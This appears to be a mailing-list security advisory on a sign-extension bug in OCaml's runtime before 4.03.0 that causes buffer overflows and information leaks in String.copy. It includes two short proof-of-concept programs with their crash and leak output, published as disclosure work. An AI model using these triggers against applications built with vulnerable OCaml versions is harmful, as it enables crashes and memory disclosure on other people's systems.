buffer overflow and information leak in OCaml < 4.03.0

[Pascal Cuoq <cuoq () trust-in-soft com>]

OCaml versions 4.02.3 and earlier have a runtime bug that, on 64-bit platforms, causes sizes arguments to an internal 
memmove call to be sign-extended from 32 to 64-bits before being passed to the memmove function.

This leads arguments between 2GiB and 4GiB to be interpreted as larger than they are (specifically, a bit below 2^64), 
causing a buffer overflow.

Arguments between 4GiB and 6GiB are interpreted as 4GiB smaller than they should be, causing a possible information 
leak.

This commit fixes the bug: 
https://github.com/ocaml/ocaml/commit/659615c7b100a89eafe6253e7a5b9d84d0e8df74#diff-a97df53e3ebc59bb457191b496c90762
The function caml_bit_string is called indirectly from such functions as String.copy. String.copy for instance is 
supposed to be a "safe" function for which OCaml's memory safety guarantees apply.

Proof of concept:
- buffer overflow

Hexa:~ $ ocamlopt -v

The OCaml native-code compiler, version 4.00.1

Standard library directory: /usr/local/Frama-C/ocaml-4.00.1p/lib/ocaml

Hexa:~ $ cat buffer_ovflw.ml

open Printf


let s1 = String.make 0x80000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () = Printf.printf "%c" s2.[1];;

Hexa:~ $ ocamlopt buffer_ovflw.ml && ./a.out

Segmentation fault: 11

- information leak

Hexa:~ $ cat infoleak.ml

let s1 = String.make 0x100000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () =

  for i = 4 to 40 do

    Printf.printf "%2x" (Char.code s2.[i]);

  done;

  Printf.printf "\n"

;;

Hexa:~ $ ocamlopt infoleak.ml && ./a.out

a 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0


OCaml applications, compiled with OCaml 4.02.3 or earlier on a 64-bit platform, that apply the defective copy functions 
to untrusted inputs are at risk. These applications should be recompiled with OCaml 4.03.0.